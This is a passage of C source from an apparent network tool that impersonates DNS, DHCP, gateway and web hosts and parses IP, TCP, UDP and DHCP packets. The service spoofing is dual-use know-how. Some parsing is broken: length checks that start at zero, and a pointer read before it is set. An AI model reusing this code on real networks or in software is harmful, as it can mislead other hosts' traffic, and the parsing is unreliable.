			printf("packet for our spoofed dns server\n");
		}
		if(p_curr->type == NOTSET){
			//printf("packet for one of our gobbled hosts\n");
		}
		if(p_curr->type == DHCPSERVER){
			printf("packet for our spoofed DHCP server\n");
		}
		if(p_curr->type == GATEWAY){
			printf("packet for our spoofed gateway\n");
		}
		if(p_curr->type == WWW){
			printf("packet for our spoofed web server\n");
		}
		if(p_curr->type == NAT){
			printf("packet for our spoofed NAT router\n");
		}

		if(!dontreplytoping){
			if(p_curr->ping == 1){
				if((f = startICMPECHOREPLY()) != 0){
					if(f == 1){
						//printf("packet for target\n");
						return(0);
					}
					else {
						printf("Opps: start icmp echo reply error\n");
						exit(1);
					}
				}
			}
			return(0);
		}
		return(0);
	}
	return(0);
}



u_int8_t handle_IP(void)
{
	struct my_ip* ip;
	u_int length = 0, hlen, off, version;
	u_int iplen;
	Packet *tsd;
	unsigned char *sbytes, *dbytes;
	
	if((tsd = (pthread_getspecific(p_key))) == NULL){
		printf("Opps: pthread_getspecific error\n");
		exit(1);
	}

	ip = (struct my_ip*)(tsd->pkt + sizeof(struct ether_header));
	length -= sizeof(struct ether_header);

	//check length of packet
	if(length < sizeof(struct my_ip)){
		if(v>1)printf("Opps: Truncated IP %d.... packet dropped\n", length);
		drop++;
		return(-1);//255 might have problems
	}

	iplen = ntohs(ip->ip_len);
	hlen = IP_HL(ip);
	version = IP_V(ip);

	if(version != 0x4){
		if(v>1)printf("Opps: IPv%x reported.... only IPv4 supported.... packet dropped\n",version);
		drop++;
		return(-1);
	}
	
	if(hlen<5){
		if(v>1)printf("Opps: hlen: %d .... too small.... packet dropped\n",hlen);
		drop++;
		return(-1);
	}
	if(length < iplen){
		if(v>1)printf("Opps: Truncated IP - %d bytes missing.... packet dropped\n", iplen - length);
		drop++;
		return(-1);
	}

	off = ntohs(ip->ip_off);
	if((off & 0x1fff) == 0){
		sbytes = (unsigned char *)&(ip->ip_src);
		dbytes = (unsigned char *)&(ip->ip_dst);
	if(v>1)printf("IP Src: %d.%d.%d.%d IP Dst: %d.%d.%d.%d Hlen: %d Ver: %d Len: %d ID: %d TTL: %d chksum: %d proto: %d\n", sbytes[0], sbytes[1], sbytes[2], sbytes[3], dbytes[0], dbytes[1], dbytes[2], dbytes[3], hlen, version, iplen, ip->ip_id, ip->ip_ttl, ip->ip_sum, ip->ip_p);
	}
	return(ip->ip_p);
}

struct udp_ports handle_UDP(void)
{
	u_int8_t checkudp(void);
	const struct my_ip *ip;
	const struct my_udp *udp;
	struct udp_ports udpports;
	unsigned char *sbytes, *dbytes;
	u_int length = 0;
	Packet *tsd;

	if((tsd = (pthread_getspecific(p_key))) == NULL){
		printf("Opps: pthread_getspecific error\n");
		exit(1);
	}

	ip = (struct my_ip*)(tsd->pkt + sizeof(struct ether_header)); 
 
	sbytes = (unsigned char *)&(ip->ip_src);
	dbytes = (unsigned char *)&(ip->ip_dst);

	udp = (struct my_udp*)(tsd->pkt +sizeof(struct ether_header) + sizeof(struct my_ip));
	length -= (sizeof(struct ether_header) + sizeof(struct my_ip));
	
	udpports.src = ntohs(udp->src_port);
	udpports.dst = ntohs(udp->dst_port);
	udpports.err = 0;
	if(length < sizeof(struct my_udp)){
		if(v)printf("Opps: Truncated UDP length: %d\n", length);
		drop++;
		udpports.err = 1;
		return(udpports);
	}
	if(v==1)printf("\n%d.%d.%d.%d -> %d.%d.%d.%d UDP Src port: %d Dst port: %d ", sbytes[0], sbytes[1], sbytes[2], sbytes[3], dbytes[0], dbytes[1], dbytes[2], dbytes[3], ntohs(udp->src_port), ntohs(udp->dst_port));
	if(v>1)printf("UDP Src port: %d Dst port: %d, ", ntohs(udp->src_port), ntohs(udp->dst_port));

	if(!sniffer){
		if(checkudp() != 0){
			if(v>1)printf("Opps: checkudp returned error\n");
		}
	}
	return(udpports);
}
	
u_int8_t handle_TCP(void)
{
	struct my_tcp *tcp;
	struct my_ip *ip;
	unsigned char *sbytes, *dbytes;
	u_int8_t checkip(int, int, int, int, int, int, int);
	u_int length = 0;
	int syn, ack, fin, rst, psh, urg, bog;
	Packet *tsd;

	syn = ack = fin = rst = psh = urg = bog = 0;

	if((tsd = (pthread_getspecific(p_key))) == NULL){
		printf("Opps: pthread_getspecific error\n");
		exit(1);
	}

 	ip = (struct my_ip*)(tsd->pkt + sizeof(struct ether_header)); 

	sbytes = (unsigned char *)&(ip->ip_src);
	dbytes = (unsigned char *)&(ip->ip_dst);
	
	tcp = (struct my_tcp*)(tsd->pkt + sizeof(struct ether_header) + sizeof(struct my_ip));
	length -= (sizeof(struct ether_header) + sizeof(struct my_ip));

	if(length < sizeof(struct my_tcp)){
		if(v)printf("Opps: Truncated TCP length: %d\n",length);
		drop++;
		return(0);
	}

	if((tcp->th_flags & TH_SYN) >> 1 ) {
		syn = 1;
	}
	else syn = 0;

	if((tcp->th_flags & TH_ACK) >>1) {
		ack = 1;
	}
	else ack = 0;
	
	if((tcp->th_flags & TH_FIN) >>1){
		fin = 1;
	}
	else fin = 0;
	
	if((tcp->th_flags & TH_RST) >>1) {
		rst = 1;
	}
	else rst = 0;
	
	if((tcp->th_flags & TH_PUSH) >>1) {
		psh = 1;
	}
	else psh = 0;
	
	if((tcp->th_flags & TH_URG) >>1) {
		urg = 1;
	}
	else urg = 0;

	//TH_BOG taken from nmap for os detection
	if((tcp->th_flags & TH_BOG ) >>1) {
		bog = 1;
		//printf("BOG\n");
	}
	else bog = 0;

	if(v==1) printf("%d.%d.%d.%d -> %d.%d.%d.%d Src port: %d Dst port: %d Seq: %u Ack: %u Syn: %d Ack: %d fin: %d rst: %d\n", sbytes[0], sbytes[1], sbytes[2], sbytes[3], dbytes[0], dbytes[1], dbytes[2], dbytes[3], ntohs(tcp->th_sport), ntohs(tcp->th_dport), ntohl(tcp->th_seq), ntohl(tcp->th_ack), syn, ack, fin, rst);
	if(v>1)printf("TCP ");
	if(v>1)printf("Src port: %d Dst port: %d Seq: %u Ack: %u Syn: %d Ack: %d fin: %d rst: %d\n", ntohs(tcp->th_sport), ntohs(tcp->th_dport), ntohl(tcp->th_seq), ntohl(tcp->th_ack), syn, ack, fin, rst);
	if(!sniffer){
		if(checkip(syn, ack, fin, rst, psh, urg, bog) != 0){
			printf("Opps: checkip returned error\n");
		}
		//send reset to keep open connections to a minimum on target host
		//Aka half open scan.
	}
	return(0);
}

u_int8_t checkudp(void)
{
	u_int8_t sendicmpportunreach(void);
	//u_int8_t senddnsreply(void);
	Packet *tsd;
	struct my_ip *ip;
	struct my_udp *udp;
	u_char *srcip, *dstip;
	PMT p_curr;

	if((tsd = (pthread_getspecific(p_key))) == NULL){
		printf("Opps: pthread_getspecific error\n");
		exit(1);
	}

	ip = (struct my_ip*)(tsd->pkt + sizeof(struct ether_header));
	udp = (struct my_udp*)(tsd->pkt + sizeof(struct ether_header) + sizeof(struct my_ip));
	srcip = (u_char *)&(ip->ip_src);
	dstip = (u_char *)&(ip->ip_dst);
	
	p_curr = mtpoint;
	if(p_curr == NULL){
		if(v>2)printf("Opps: ll is empty\n");
		return(0);
	}
	while((p_curr != NULL) && (p_curr->ipaddress != ip->ip_dst)){
		p_curr = (PMT) p_curr->nextmt;
	}
	if(p_curr == NULL){
		if(v>2)printf("Opps: Can't find entry in ll\n");
		return(0);
	}
	printf("%d.%d.%d.%d:%d is trying to connect to %d.%d.%d.%d:%d (UDP).... one of our machines!!!!\n", srcip[0], srcip[1], srcip[2], srcip[3], ntohs(udp->src_port), dstip[0], dstip[1], dstip[2], dstip[3], ntohs(udp->dst_port));
	
	if(p_curr->type == DNS){
		printf("packet for our spoofed dns server\n");
		//if(senddnsreply() !=0){
		//	printf("Opps: start dnsreply error\n");
		//	return(0);
		//}
		return(0);
	}
	
	if(ntohs(udp->dst_port) != openudpport) {
		//printf("Sending RST\n");
		if(sendicmpportunreach() != 0){
			printf("Opps: sendicmpportunreach failed\n");
		}
		else printf("Sent icmpportunreach\n");
		return(0);
	}
	//udp doesn;t reply by default as it is connectionless

	
	//shoiuldn't reach here but we contunue anywayz
	return(0);
	
}


	
u_int8_t handle_DHCP(void)
{
	struct my_dhcp *dhcp;
	struct my_ip *ip;
	struct ether_header *eptr;
	unsigned char *bytes, *srcip, *yaddr, *macsrc;
	unsigned int convert32(char *ptr, int anum, int bnum, int cnum, int dnum);
	unsigned int convert16(char *ptr, int anum, int bnum);
	u_int8_t  dnsa = 0, dnsb = 0, dnsc = 0, dnsd = 0;
	u_int length = 0, t;
	Packet *tsd;
	u_int8_t len;
	int loop, padcount, type;
	char *pbuf = dhcp->buf;//ponter to buffer for convert
	
	if((tsd = (pthread_getspecific(p_key))) == NULL){
		printf("Opps: pthread_getspecific error\n");
		exit(1);
	}
	t = 0;
	padcount = 0;
	type = 0;
	
	eptr = (struct ether_header *)(tsd->pkt);
	macsrc = (unsigned char *)&(eptr->ether_shost);
		
	ip = (struct my_ip*)(tsd->pkt + sizeof(struct ether_header));
	srcip = (unsigned char *)&(ip->ip_src);
	
	dhcp = (struct my_dhcp*)(tsd->pkt + sizeof(struct ether_header) + sizeof(struct my_ip) + sizeof(struct my_udp));
	length -= (sizeof(struct ether_header) + sizeof(struct my_ip) + sizeof(struct my_udp));

	if(length < sizeof(struct my_dhcp)){
		printf("Opps: Truncated DHCP packet length: %d\n",length);
		drop++;
		return(-1); //255 but who cares were only returning the dhcp packet type
	}
	if(dhcp->opcode == 1){
		if(v>1)printf("DHCP opcode = 1 boot request, ");
	}
	else if(dhcp->opcode == 2){
		if(v>1)printf("DHCP opcode = 2 boot reply, ");
	}
	else {
		printf("Opps: Unknown opcode type\n");
		drop++;
		return(-1);
	}
	
	if(dhcp->type == 1){
		if(v>1)printf("H_type = 10mb Enet, ");
	}
	else {
		if(v)printf("Opps: Unsupported hardware type 0x%x\n", dhcp->type);
		drop++;
		exit(1);
	}

	if(v>1) printf("Hops %d, ", dhcp->hops);
	if(v>1) printf("Transaction ID 0x%x, ", ntohl(dhcp->trans_id));
	if(v>1) printf("Elapsed time %d, ", dhcp->t_elapsed);
	
	if(dhcp->flags == 0x80){
		if(v>1)printf("flags 0x%x (bcast), ", dhcp->flags);
	}
	else{
		if(v>1) printf("flags 0x%x, ",dhcp->flags);
	}

	bytes = (unsigned char *)&(dhcp->cliaddr);
	if(v>1)printf("cliaddr %d.%d.%d.%d, ", bytes[0], bytes[1], bytes[2], bytes[3]);
	
	yaddr = (unsigned char *)&(dhcp->yaddr);
	if(v>1)printf("your cliaddr %d.%d.%d.%d, ", yaddr[0], yaddr[1], yaddr[2], yaddr[3]);
	
	bytes = (unsigned char *)&(dhcp->siaddr);
	if(v>1)printf("next dhcp server %d.%d.%d.%d, ", bytes[0], bytes[1], bytes[2], bytes[3]);
	
	bytes = (unsigned char *)&(dhcp->giaddr);
	if(v>1)printf("gateway ip %d.%d.%d.%d, ", bytes[0], bytes[1], bytes[2], bytes[3]);

	if(v>1)printf("cli hw addr %.2x:%.2x:%.2x:%.2x:%.2x:%.2x, ",  dhcp->clihwaddr[0], dhcp->clihwaddr[1], dhcp->clihwaddr[2], dhcp->clihwaddr[3], dhcp->clihwaddr[4], dhcp->clihwaddr[5]);
	
	//random gap.... guessing for larger mac addr without checkin the rfc
	//only enet MAC allowed at the moment
	
	if(v>2)printf("serv hostname %s,", dhcp->sname);
	if(v>2)printf("bootfile %s, ",dhcp->bname);
	
	
	bytes = (unsigned char *)&(dhcp->magic);
	if((bytes[0] == 0x63) && (bytes[1] == 0x82) && (bytes[2] == 0x53) &&(bytes[3] == 0x63)){
		if(v>2)printf("magic cookie %.2x.%.2x.%.2x.%.2x ",bytes[0], bytes[1], bytes[2], bytes[3]); //problems
	}
	else {
		printf("Opps: invalid DHCP magic cookie %.2x.%.2x.%.2x.%.2x should be 63.83.53.63 packet dropped\n",bytes[0], bytes[1], bytes[2], bytes[3]);
		drop++;
		return(-1);
		//return error
	}
	
	//start of misc options
	while(t<length){
		len = 0;
	 	//printf("t %d length %d",t,length);
		switch (dhcp->buf[t]) {
			//start of switch for option tag
			//255 different tags.... not all supported

			case 1: //subnet address
				len = (u_int8_t)dhcp->buf[t+1];
     				if(len != 4){
					if(v)printf("Opps: invalid subnet length %x... returning\n\n", len);
					return(-1);
				}
				subneta = dhcp->buf[t+2];
      				subnetb = dhcp->buf[t+3];
      				subnetc = dhcp->buf[t+4];
      				subnetd = dhcp->buf[t+5];
      				if(v>1){
					printf("Subnet Mask: ");
	      				for(loop = 0; loop <len; loop++){
      						printf("%d ", (u_int8_t)dhcp->buf[t+loop+2]);
      					}
					
					printf(", ");
				}
				t = t+len+2;
      				if(dhcp->buf[t] == -1){
					t++; //end of list
				}
				else{
					if(v>2)printf("Opps: possible end of list missing, rest of packet may be jibberish, ");
				}
				break;

			case 2: //time option
				len = (u_int8_t)dhcp->buf[t+1];
				if(len != 4){
					if(v)printf("Opps: invalid time length %x... returning\n\n",len);
					return(-1);
				}
				if(v>1){
					printf("time: %d", (u_int32_t) convert32(pbuf, t+2, t+3, t+4, t+5));
				}
				t = t+len+2;
				if(dhcp->buf[t] == -1){
					t++; //end of list
				}
				else{
					if(v>2)printf("Opps: possible end of list missing, rest of packet may be jibberish, ");
				}
				break;
			
				
      			case 3: //router option (default gateway)
      				len = (u_int8_t)dhcp->buf[t+1];
				if((len != 4) && (len != 8) && (len != 12) && (len != 16)){
					if(v)printf("Opps: invaild router option length %x... returning\n\n", len);
					return(-1);
				}
				gatewaya = dhcp->buf[t+2];
      			       	gatewayb = dhcp->buf[t+3];
      			       	gatewayc = dhcp->buf[t+4];
      			       	gatewayd = dhcp->buf[t+5];
      				if(v>1){
					printf("Router (len %d): %d.%d.%d.%d, ", len, (u_int8_t)dhcp->buf[t+2], (u_int8_t)dhcp->buf[t+3], (u_int8_t)dhcp->buf[t+4], (u_int8_t)dhcp->buf[t+5]);
				}
      				t = t+len+2;
      				if(dhcp->buf[t] == -1){
      				 	t++; //end of list
      				}
      				
				else {
					if(v>2)printf("Opps: possible end of list missing, rest of packet may be jibberish, ");
                                }
                                break;

			case 4:	//time server option
				len = (u_int8_t)dhcp->buf[t+1];
				if((len != 4) && (len != 8) && (len != 12) && (len != 16) ){
					if(v)printf("Opps: invaild time server IP length %x... returning\n\n", len);
					return(-1);
				}
			 	if(v>1) {
					printf("time server (len %d): %d.%d.%d.%d, ", len, (u_int8_t)dhcp->buf[t+2], (u_int8_t)dhcp->buf[t+3], (u_int8_t)dhcp->buf[t+4], (u_int8_t)dhcp->buf[t+5]);
				}
      				t = t+len+2;
      				if(dhcp->buf[t] == -1){
      				 	t++; //end of list
      				}
      				
				else {
					if(v>2)printf("Opps: possible end of list missing, rest of packet may be jibberish, ");
                                }
                                break;

			case 5: //name server
				len = (u_int8_t)dhcp->buf[t+1];
				if((len != 4) && (len != 8) && (len != 12) && (len != 16) ){
					if(v)printf("Opps: invaild name server IP length %x... returning\n\n", len);
					return(-1);
				}
			 	if(v>1){
					printf("name server (len %d): %d.%d.%d.%d, ", len, (u_int8_t)dhcp->buf[t+2], (u_int8_t)dhcp->buf[t+3], (u_int8_t)dhcp->buf[t+4], (u_int8_t)dhcp->buf[t+5]);
				}
      				t = t+len+2;
      				if(dhcp->buf[t] == -1){
      				 	t++; //end of list
      				}
      				
				else {
					if(v>2)printf("Opps: possible end of list missing, rest of packet may be jibberish, ");
                                }
                                break;


                                                                                 
                        case 6: //domain name server
                              	len = (u_int8_t)dhcp->buf[t+1];
                              	if((len != 4) && (len != 8) && (len != 12) && (len != 16) ){
					if(v)printf("Opps: invaild dns IP length %x... returning\n\n", len);
					return(-1);
				}

				dnsa = dhcp->buf[t+2];
                              	dnsb = dhcp->buf[t+3];
                              	dnsc = dhcp->buf[t+4];
                              	dnsd = dhcp->buf[t+5];
                              	//still need to sort 2nd dns server
                              	if(v>1) {
					printf("DNS IP: ");
	                             	for(loop = 0; loop <len; loop++){
						printf("%d ", (u_int8_t)dhcp->buf[t+loop+2]);
					}
					printf(", ");
				}
				t = t+len+2;
				if(dhcp->buf[t] == -1){
					t++; //end of list
				}
				else {
					if(v>2)printf("Opps: possible end of list missing, rest of packet may be jibberish ");
				}
				break;

			case 7: //log server
				len = (u_int8_t)dhcp->buf[t+1];
				if((len != 4) && (len != 8) && (len != 12) && (len != 16) ){
					if(v)printf("Opps: invaild log server IP length %x... returning\n\n", len);
					return(-1);
				}
			 	if(v>1) printf("log server (len %d): %d.%d.%d.%d, ", len, (u_int8_t)dhcp->buf[t+2], (u_int8_t)dhcp->buf[t+3], (u_int8_t)dhcp->buf[t+4], (u_int8_t)dhcp->buf[t+5]);
      				t = t+len+2;
      				if(dhcp->buf[t] == -1){
      				 	t++; //end of list
      				}
      				
				else {
					if(v>2)printf("Opps: possible end of list missing, rest of packet may be jibberish, ");
                                }
                                break;
	
			case 8: //cookie server
				len = (u_int8_t)dhcp->buf[t+1];
				if((len != 4) && (len != 8) && (len != 12) && (len != 16) ){
					if(v)printf("Opps: invaild cookie server IP length %x... returning\n\n", len);
					return(-1);
				}
			 	if(v>1) printf("cookie server (len %d): %d.%d.%d.%d, ", len, (u_int8_t)dhcp->buf[t+2], (u_int8_t)dhcp->buf[t+3], (u_int8_t)dhcp->buf[t+4], (u_int8_t)dhcp->buf[t+5]);
      				t = t+len+2;
      				if(dhcp->buf[t] == -1){
      				 	t++; //end of list
      				}
      				
				else {
					if(v>2)printf("Opps: possible end of list missing, rest of packet may be jibberish, ");
                                }
                                break;
						

			case 9: //LPR server
				len = (u_int8_t)dhcp->buf[t+1];
				if((len != 4) && (len != 8) && (len != 12) && (len != 16) ){
					if(v)printf("Opps: invaild LPR IP length %x... returning\n\n", len);
					return(-1);
				}
			 	if(v>1) printf("LPR server (len %d): %d.%d.%d.%d, ", len, (u_int8_t)dhcp->buf[t+2], (u_int8_t)dhcp->buf[t+3], (u_int8_t)dhcp->buf[t+4], (u_int8_t)dhcp->buf[t+5]);
      				t = t+len+2;
      				if(dhcp->buf[t] == -1){
      				 	t++; //end of list
      				}
      				
				else {
					if(v>2)printf("Opps: possible end of list missing, rest of packet may be jibberish, ");
                                }
                                break;
	
			case 10: //Impress server
				len = (u_int8_t)dhcp->buf[t+1];
				if((len != 4) && (len != 8) && (len != 12) && (len != 16) ){
					if(v)printf("Opps: invaild impress server IP length %x... returning\n\n", len);
					return(-1);
				}
			 	if(v>1) printf("impress server (len %d): %d.%d.%d.%d, ", len, (u_int8_t)dhcp->buf[t+2], (u_int8_t)dhcp->buf[t+3], (u_int8_t)dhcp->buf[t+4], (u_int8_t)dhcp->buf[t+5]);
      				t = t+len+2;
      				if(dhcp->buf[t] == -1){
      				 	t++; //end of list
      				}
      				
				else {
					if(v>2)printf("Opps: possible end of list missing, rest of packet may be jibberish, ");
                                }
                                break;

			case 11: //resoure location server
				len = (u_int8_t)dhcp->buf[t+1];
				if((len != 4) && (len != 8) && (len != 12) && (len != 16) ){
					if(v)printf("Opps: invaild name server IP length %x... returning\n", len);
					return(-1);
				}
			 	if(v>1) printf("resource location server (len %d): %d.%d.%d.%d, ", len, (u_int8_t)dhcp->buf[t+2], (u_int8_t)dhcp->buf[t+3], (u_int8_t)dhcp->buf[t+4], (u_int8_t)dhcp->buf[t+5]);
      				t = t+len+2;
      				if(dhcp->buf[t] == -1){
      				 	t++; //end of list
      				}
      				
				else {
					if(v>2)printf("Opps: possible end of list missing, rest of packet may be jibberish, ");
                                }
                                break;

				
			case 12: //hostname
		        	len = (u_int8_t)dhcp->buf[t+1];
				if(len > 255){
					if(v)printf("Opps: invalid hostname length %d... returning\n", len);
					return(-1);
				}
			        if(v>1){
					printf("Hostname: ");
					for(loop = 0; loop <len; loop++){
						printf("%c",(char)dhcp->buf[t+loop+2]);
					}
					printf(", ");
				}
				t = t+len+2;
				if(dhcp->buf[t] == -1){
					t++; //end of list
				}
				else{
					if(v>2)printf("Opps: possible end of list missing, rest of packet may be jibberish, ");
				}
				break;

			case 13: //boot file size
				len = (u_int8_t)dhcp->buf[t+1];
				if(len != 2){
					if(v)printf("Opps: invaild boot file size %x... returning\n\n", len);
					return(-1);
				}
			 	if(v>1) printf("bootfile size %d", (u_int32_t)convert16(pbuf, t+2, t+3));
      				t = t+len+2;
      				if(dhcp->buf[t] == -1){
      				 	t++; //end of list
      				}
      				
				else {
					if(v>2)printf("Opps: possible end of list missing, rest of packet may be jibberish, ");
                                }
                                break;

			case 14: //merit dump file
				len = (u_int8_t)dhcp->buf[t+1];
     				if(len < 1){
					if(v)printf("Opps: invalid domain name size %x... returning\n\n", len);
					return(-1);
				}

				if(v>1){
					printf("Dump path: ");
	      				for(loop = 0; loop <len; loop++){
      						printf("%c", (char)dhcp->buf[t+loop+2]);
      					}
				}
				if(v>1)printf(", ");
				t = t+len+2;
 				if(dhcp->buf[t] == -1){
					t++; //end of list
				}
				else{
					if(v>2)printf("Opps: possible end of list missing, rest of packet may be jibberish, ");
				}
     				break;

			case 15: //domain name
				len = (u_int8_t)dhcp->buf[t+1];
				if(len < 1){
				if(v)printf("Opps: invalid domain name size %x... returning\n\n", len);
					return(-1);
				}
				if(v>1){
					printf("Domain name: ");
					for(loop = 0; loop <len; loop++){
						printf("%c", (u_char)dhcp->buf[t+loop+2]);
					}
				}
				if(v>1)printf(", ");
				t = t+len+2;
				if(dhcp->buf[t] == -1){
					t++; //end of list
				}
				else{
					if(v>2)printf("Opps: possible end of list missing, rest of packet may be jibberish, ");
				}
				break;

			case 16: //swap server
				len = (u_int8_t)dhcp->buf[t+1];
				if(len != 4){
					if(v)printf("Opps: invalid swap server IP length %x... returning\n\n", len);
					return(-1);
				}
				if(v>1){
					printf("swap server: %d.%d.%d.%d,", (u_int8_t)dhcp->buf[t+2], (u_int8_t)dhcp->buf[t+3], (u_int8_t)dhcp->buf[t+4], (u_int8_t)dhcp->buf[t+5]);
				}
				t = t+len+2;
				if(dhcp->buf[t] == -1){
					t++; //end of list
				}
				else{
					if(v>2)printf("Opps: possible end of list missing, rest of packet may be jibberish, ");
				}
				break;


			case 17: //root path
				len = (u_int8_t)dhcp->buf[t+1];
				if(len < 1){
					if(v)printf("Opps: invalid root path size %x... returning\n\n", len);
					return(-1);
				}
				if(v>1){
					printf("root path: ");
					for(loop = 0; loop <len; loop++){
						printf("%c", (u_char)dhcp->buf[t+loop+2]);
					}
				}
				if(v>1)printf(" ");
				t = t+len+2;
				if(dhcp->buf[t] == -1){
					t++; //end of list
				}
				else{
					if(v>2)printf("Opps: possible end of list missing, rest of packet may be jibberish, ");
				}
				break;
	
			case 18: //extensions path
				len = (u_int8_t)dhcp->buf[t+1];
				if(len < 1){
					if(v)printf("Opps: invalid extensions path size %x... returning\n\n", len);
					return(-1);
				}
					if(v>1){
					printf("extension path: ");
					for(loop = 0; loop <len; loop++){
						printf("%c", (u_char)dhcp->buf[t+loop+2]);
					}
				}
				if(v>1)printf(" ");
				t = t+len+2;
				if(dhcp->buf[t] == -1){
					t++; //end of list
				}
				else{
					if(v>2)printf("Opps: possible end of list missing, rest of packet may be jibberish, ");
				}
				break;
				
			case 19: //ip forwarding
				len = (u_int8_t)dhcp->buf[t+1];
				if(len != 1){
					if(v)printf("Opps: invalid ip forwarding size %x... returning\n\n", len);
					return(-1);
				}
				if(v>1){
					printf("ip forwarding %d, ", (u_int32_t)dhcp->buf[t+2]);
				}
					
				t = t+len+2;
				if(dhcp->buf[t] == -1){
					t++; //end of list
				}
				else{
					if(v>2)printf("Opps: possible end of list missing, rest of packet may be jibberish, ");
				}
				break;

			case 20: //Non local source routing
				len = (u_int8_t)dhcp->buf[t+1];
				if(len != 1){
					if(v)printf("Opps: invalid non local source routing size %x... returning\n\n", len);
					return(-1);
				}
				if(v>1){
					printf("non local source routing size %d, ", (u_int32_t)dhcp->buf[t+2]);
				}
					
				t = t+len+2;
					if(dhcp->buf[t] == -1){
					t++; //end of list
				}
				else{
					if(v>2)printf("Opps: possible end of list missing, rest of packet may be jibberish, ");
				}
				break;

			case 43: //vendor specific info
				len = (u_int8_t)dhcp->buf[t+1];
				if(len < 1){
					if(v)printf("Opps: invalid vendor specific info size %x... returning\n\n", len);
					return(-1);
				}
				if(v>1){
					printf("vendor specific info: %d, ", (u_int32_t)dhcp->buf[t+2]);
					for(loop = 0; loop < len; loop ++){
						printf("0x%.2x", (u_int8_t)dhcp->buf[t+loop+2]);
					}
				}
					
				t = t+len+2;
					if(dhcp->buf[t] == -1){
					t++; //end of list
				}
				else{
					if(v>2)printf("Opps: possible end of list missing, rest of packet may be jibberish, ");
				}
				break;
				
			case 50://request IP address
				len = (u_int8_t)dhcp->buf[t+1];
			        if(len != 4){
					if(v)printf("Opps: invalid size in request IP address %x... returning\n\n", len);
					return(-1);
				}
	//reqipa = convert8(heada->buf, (t+2));
				//reqipb = convert8(heada->buf, (t+3));
			        //reqipc = convert8(heada->buf, (t+4));
				//reqipd = convert8(heada->buf, (t+5));
			        if(v>1)printf("Request IP address: %d.%d.%d.%d, ",(u_int8_t)dhcp->buf[t+2], (u_int8_t)dhcp->buf[t+3], (u_int8_t)dhcp->buf[t+4], (u_int8_t)dhcp->buf[t+5]);
				t = t+len+2;
				if(dhcp->buf[t] == -1){
					t++; //end of list 0xff
				}
				else {
					if(v>2) printf("Opps: possible end of list missing, rest of the packet may be jibberish, ");
				}
				break;
			
			case 51: //IP address lease time
				len = (u_int8_t)dhcp->buf[t+1];
				if(len != 4){
					if(v)printf("Opps: invalid vendor specific indo size %x... returning\n\n", len);
					return(-1);
				}
	        //leasea = convert8(heada->buf, (t+2));
				//leaseb = convert8(heada->buf, (t+3));
				//leasec = convert8(heada->buf, (t+4));
				//leased = convert8(heada->buf, (t+5));
				if(v>1) printf("IP address lease time: ");
				if(len == 4){
				if(v>1)printf("%d secs", (u_int32_t)convert32(pbuf, (t+2), (t+2+1), (t+2+2), (t+2+3)));
				}
				if(v>1)printf(", ");
				t = t+len+2;
				if(dhcp->buf[t] == -1){
					t++; //end of list
				}
				else{
					if(v>2)printf("Opps: possible end of list missing, rest of packet may be jibberish, ");
				}
				break;

			 case 52: //options overload
				len = (u_int8_t)dhcp->buf[t+1];
				if(len != 1){
					if(v)printf("Opps: invalid options overload size %x... returning\n\n", len);
					return(-1);
				}
				if(v>1)printf("option overload %d,", (u_int32_t)dhcp->buf[t+2]);
				t = t+len+2;
				if(dhcp->buf[t] == -1){
					t++; //end of list
				}
				else{
					if(v>2)printf("Opps: possible end of list missing, rest of packet may be jibberish, ");
				}
				break;
				
			 case 53: //Message Type
				len = (u_int8_t)dhcp->buf[t+1];
				if(len != 1){
					if(v)printf("Opps: invalid message type size %x... returning\n\n", len);
					return(-1);
				}

				if(v>1) printf("TYPE: %d ", dhcp->buf[t+len+1]);
				if((dhcp->buf[t+len+1]) == 1){
					if(v>1)printf("DHCP Discover, ");
					t = t+len+2;
					type = DHCPDISCOVER;
					break;
				}
				else if((dhcp->buf[t+len+1]) == 2){
					if(v>1)printf("DHCP Offer, ");
					t = t+len+2;
					type = DHCPOFFER;
					break;
				}
				else if((dhcp->buf[t+len+1]) == 3){
					if(v>1)printf("DHCP Request, ");
					t = t+len+2;
					type = DHCPREQUEST;
					break;
				}
				
				else if((dhcp->buf[t+len+1]) == 4){
					if(v>1)printf("DHCP Decline, ");
					t = t+len+2;
					type = DHCPDECLINE;
					break;
				}
				else if((dhcp->buf[t+len+1]) == 5){
					if(v>1)printf("DHCP Ack, ");
					t = t+len+2;
					type = DHCPACK;
					break;
				}
				
				else if((dhcp->buf[t+len+1]) == 6){
					if(v>1)printf("DHCP Nack, ");
					t = t+len+2;
					type = DHCPNACK;
					break;
				}
				
				else if((dhcp->buf[t+len+1]) == 7){
					if(v>1)printf("DHCP Release, ");
					t = t+len+2;
					type = DHCPRELEASE;
					break;
				}
				
				else if((dhcp->buf[t+len+1]) == 8){
					if(v>1)printf("DHCP Inform, ");
					t = t+len+2;
					type = DHCPINFORM;
					break;
				}

				break; //shouldn't reach here
			
		   
			   case 54: //server IP
				len = (u_int8_t)dhcp->buf[t+1];
		                if(len != 4){
					if(v)printf("Opps: invalid server IP size %d... returning\n\n", len);
					return(-1);
				}
				if(v>1)printf("Server IP: ");
				for(loop = 0; loop <len; loop++){
					if(v>1)printf("%d ",(u_int8_t)dhcp->buf[t+loop+2]);
				}
				if(v>1)printf(", ");
				t = t+len+2;
				if(dhcp->buf[t] == -1){
					//if(verbose) printf("End of Server IP parameter list\n");
					t++;
				}
				else {
					if(v>2) printf("Opps: possible end of list missing, rest of the packet may be jibberish, ");
				}
				
				break;
		
			 case 55: //request list
				len = (u_int8_t)dhcp->buf[t+1];
				if(len < 1){
					if(v)printf("Opps: invalid request list size %x... returning\n\n", len);
					return(-1);
				}

				if(v>1)printf("Request parameters list: ");
				for(loop = 0; loop <len; loop++){
					//can be any of the dhcp options
					if((dhcp->buf[t+loop+2]) == 1){
						if(v>1)printf("subnet_mask ");
					}
				
					else if((dhcp->buf[t+loop+2]) == 2){
						if(v>1)printf("time_offset ");
					}
				
					else if((dhcp->buf[t+loop+2]) == 3){
						if(v>1)printf("router ");
					}
					
					else if((dhcp->buf[t+loop+2]) == 6){
						if(v>1)printf("domain_srv ");
					}
					
					else if((dhcp->buf[t+loop+2]) == 7){
						if(v>1)printf("log_server ");
					}
					
					else if((dhcp->buf[t+loop+2]) == 8){
						if(v>1)printf("cookie_server ");
					}
					
					else if((dhcp->buf[t+loop+2]) == 9){
						if(v>1)printf("LPR_server ");
					}
	
					else if((dhcp->buf[t+loop+2]) == 10){
						if(v>1)printf("Impress_server ");
					}

					else if((dhcp->buf[t+loop+2]) == 11){
						if(v>1)printf("resource_Location_server");
					}

					else if((dhcp->buf[t+loop+2]) == 12){
						if(v>1)printf("hostname ");
					}

